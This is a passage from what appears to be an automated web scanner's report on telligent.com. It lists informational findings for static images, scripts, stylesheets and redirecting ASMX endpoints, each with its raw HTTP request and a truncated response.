Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT; expires=Sun, 26-Feb-2012 22:04:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:39 GMT
Content-Length: 2877

/**
* SyntaxHighlighter
* http://alexgorbatchev.com/SyntaxHighlighter
*
* SyntaxHighlighter is donationware. If you are using it, please donate.
* http://alexgorbatchev.com/SyntaxHighlighter/dona
...[SNIP]...

7.407. http://telligent.com/Themes/Custom/Images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Themes/Custom/Images/spacer.gif

Request

GET /Themes/Custom/Images/spacer.gif HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Fri, 29 Aug 2008 04:29:27 GMT
Accept-Ranges: bytes
ETag: "1ee0abd28f9c91:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a50+GMT; expires=Sun, 26-Feb-2012 22:04:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:50 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

7.408. http://telligent.com/Themes/Custom/images/icon-email-white.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Themes/Custom/images/icon-email-white.gif

Request

GET /Themes/Custom/images/icon-email-white.gif HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Wed, 27 Jan 2010 21:06:36 GMT
Accept-Ranges: bytes
ETag: "e1b8be9c949fca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a49+GMT; expires=Sun, 26-Feb-2012 22:04:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:49 GMT
Content-Length: 418

GIF89a.......A........q........Q.....]........|........e.....B...........S..............h.......................L..X.....u........k.....................................................................
...[SNIP]...

7.409. http://telligent.com/Themes/Custom/images/logo-ta-med.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Themes/Custom/images/logo-ta-med.png

Request

GET /Themes/Custom/images/logo-ta-med.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/request_a_demo.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a56+GMT; CommunityServer-LastVisitUpdated-1850=

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Fri, 09 Apr 2010 19:51:36 GMT
Accept-Ranges: bytes
ETag: "054d9f1ed8ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a58+GMT; expires=Sun, 26-Feb-2012 23:23:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:57 GMT
Content-Length: 7212

.PNG
.
...IHDR....... .....f{.{....sBIT.....O....    pHYs...........~.....tEXtCreation Time.04/09/10........tEXtSoftware.Adobe FireworksO..N....IDATx..\y|.U..U....N.>;.En.. ...5....2(...:.d\........Jd.
...[SNIP]...

7.410. http://telligent.com/Themes/Custom/images/logo-tc-med.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Themes/Custom/images/logo-tc-med.png

Request

GET /Themes/Custom/images/logo-tc-med.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/request_a_demo.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a56+GMT; CommunityServer-LastVisitUpdated-1850=

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Fri, 09 Apr 2010 19:47:18 GMT
Accept-Ranges: bytes
ETag: "0a711761dd8ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a58+GMT; expires=Sun, 26-Feb-2012 23:23:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:57 GMT
Content-Length: 7829

.PNG
.
...IHDR....... ......A.....sBIT.....O....    pHYs...........~.....tEXtCreation Time.04/09/10........tEXtSoftware.Adobe FireworksO..N....IDATx..\i`.U.>..I/Iw.;Kwv..{.!B.D.d.7.cx..qA.qF.........(
...[SNIP]...

7.411. http://telligent.com/Themes/Custom/images/logo-te-med.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Themes/Custom/images/logo-te-med.png

Request

GET /Themes/Custom/images/logo-te-med.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/request_a_demo.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a56+GMT; CommunityServer-LastVisitUpdated-1850=

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Fri, 09 Apr 2010 19:49:26 GMT
Accept-Ranges: bytes
ETag: "0e75cc21dd8ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a58+GMT; expires=Sun, 26-Feb-2012 23:23:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:57 GMT
Content-Length: 7582

.PNG
.
...IHDR.......!.....eK......sBIT.....O....    pHYs...........~.....tEXtCreation Time.04/09/10........tEXtSoftware.Adobe FireworksO..N....IDATx..|{\SW..:y....!!....w@.D+..omk..Ymun.sg.w..o.?.....
...[SNIP]...

7.412. http://telligent.com/Themes/Custom/images/partners-page-learnmore-background.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Themes/Custom/images/partners-page-learnmore-background.png

Request

GET /Themes/Custom/images/partners-page-learnmore-background.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a47+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 08 Dec 2009 08:09:51 GMT
Accept-Ranges: bytes
ETag: "f23f3bd1dd77ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a52+GMT; expires=Sun, 26-Feb-2012 22:04:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:52 GMT
Content-Length: 2806

.PNG
.
...IHDR.....................sBIT.....O....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.12/08/09..f...
SIDATx...OL........4.N.@&...h.    J.&...R..K!-... -....Z&%j.U
...[SNIP]...

7.413. http://telligent.com/Themes/Custom/images/products-page-logo-tc.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Themes/Custom/images/products-page-logo-tc.png

Request

GET /Themes/Custom/images/products-page-logo-tc.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 08 Dec 2009 07:35:53 GMT
Accept-Ranges: bytes
ETag: "9c6e9512d977ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a51+GMT; expires=Sun, 26-Feb-2012 22:04:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:51 GMT
Content-Length: 8596

.PNG
.
...IHDR.......!.....v.......sBIT.....O....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.12/08/09..f... .IDATx..|y........}....e...g..a`..aq......&.Bb"...&/n.<%..
...[SNIP]...

7.414. http://telligent.com/Utility/ContentFragments/CMS/ContentMenu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/ContentFragments/CMS/ContentMenu.js

Request

GET /Utility/ContentFragments/CMS/ContentMenu.js?Version=5.5.134.11785 HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 21 Jan 2010 15:29:09 GMT
Accept-Ranges: bytes
ETag: "7db147aae9aca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT; expires=Sun, 26-Feb-2012 22:04:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:48 GMT
Content-Length: 12711

var CMS_ContentMenu_CurrentContentMenu = null;

function CMS_ContentMenu_ShowNav(context, parentMenuItemKey, e) {

if (context.parameter.hideTimer) {
clearTimeout(context.parameter.hi
...[SNIP]...

7.415. http://telligent.com/Utility/ContentFragments/CMS/ContentMenuAjax.asmx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/ContentFragments/CMS/ContentMenuAjax.asmx

Request

GET /Utility/ContentFragments/CMS/ContentMenuAjax.asmx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /error.htm?aspxerrorpath=/Utility/ContentFragments/CMS/ContentMenuAjax.asmx
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a13+GMT; expires=Sun, 26-Feb-2012 23:21:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:12 GMT
Connection: close
Content-Length: 206

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror.htm%3faspxerrorpath%3d%2fUtility%2fContentFragments%2fCMS%2fContentMenuAjax.asmx">here</a>.</h2>
</body></h
...[SNIP]...

7.416. http://telligent.com/Utility/FooterFragments/Core/UserInfoPopup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/FooterFragments/Core/UserInfoPopup.js

Request

GET /Utility/FooterFragments/Core/UserInfoPopup.js?Version=5.5.134.11785&LastChanged=633989878560000000 HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 13 Jan 2010 13:57:36 GMT
Accept-Ranges: bytes
ETag: "084c5c5894ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a49+GMT; expires=Sun, 26-Feb-2012 22:04:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:49 GMT
Content-Length: 6913


function Core_UserInfoPopup_AttachToUserElements(context)
{
$('.internal-link.view-user-profile, .internal-link.view-profile, .avatar > a')
.live("mouseover", function() { Core_UserIn
...[SNIP]...

7.417. http://telligent.com/Utility/FooterFragments/Core/UserInfoPopupAjax.asmx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/FooterFragments/Core/UserInfoPopupAjax.asmx

Request

GET /Utility/FooterFragments/Core/UserInfoPopupAjax.asmx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /error.htm?aspxerrorpath=/Utility/FooterFragments/Core/UserInfoPopupAjax.asmx
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a14+GMT; expires=Sun, 26-Feb-2012 23:21:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:14 GMT
Connection: close
Content-Length: 208

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror.htm%3faspxerrorpath%3d%2fUtility%2fFooterFragments%2fCore%2fUserInfoPopupAjax.asmx">here</a>.</h2>
</body><
...[SNIP]...

7.418. http://telligent.com/Utility/HeaderFragments/CMS/suckerfish.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/HeaderFragments/CMS/suckerfish.css

Request

GET /Utility/HeaderFragments/CMS/suckerfish.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Tue, 26 Jan 2010 23:00:51 GMT
Accept-Ranges: bytes
ETag: "82701a68db9eca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a47+GMT; expires=Sun, 26-Feb-2012 22:04:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:46 GMT
Content-Length: 2333

/* Navigation */
#ChildMenuListContainer{
   height:20px;
   padding-top:10;
   background-color:#FFF;
   z-index:10;
   padding-left:30px;
   padding-bottom:5px;
}

#ChildMenuListContainer a:link, #Chi
...[SNIP]...

7.419. http://telligent.com/Utility/HeaderFragments/CMS/suckerfish.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/HeaderFragments/CMS/suckerfish.js

Request

GET /Utility/HeaderFragments/CMS/suckerfish.js?Version=5.5.134.11785 HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 02 Dec 2009 20:06:22 GMT
Accept-Ranges: bytes
ETag: "db523eb8a73ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT; expires=Sun, 26-Feb-2012 22:04:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:48 GMT
Content-Length: 457

$(document).ready(function() {
$("#nav-one li").hover(
function() { $("ul", this).fadeIn(0); },
               function() { $("ul", this).fadeOut(0); }
       );
if (document.all) {

...[SNIP]...

7.420. http://telligent.com/Utility/HeaderFragments/Core/GroupNavigation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/HeaderFragments/Core/GroupNavigation.js

Request

GET /Utility/HeaderFragments/Core/GroupNavigation.js?Version=5.5.134.11785 HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 30 Mar 2010 13:08:26 GMT
Accept-Ranges: bytes
ETag: "0c15a15ad0ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT; expires=Sun, 26-Feb-2012 22:04:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:48 GMT
Content-Length: 13969

var Core_GroupNavigation_CurrentGroupNavigation = null;

function Core_GroupNavigation_ShowNav(context, parentGroupId, e) {

Core_GroupNavigation_HidePopup(context);

if (e && context.pa
...[SNIP]...

7.421. http://telligent.com/Utility/HeaderFragments/Core/GroupNavigationAjax.asmx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/HeaderFragments/Core/GroupNavigationAjax.asmx

Request

GET /Utility/HeaderFragments/Core/GroupNavigationAjax.asmx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
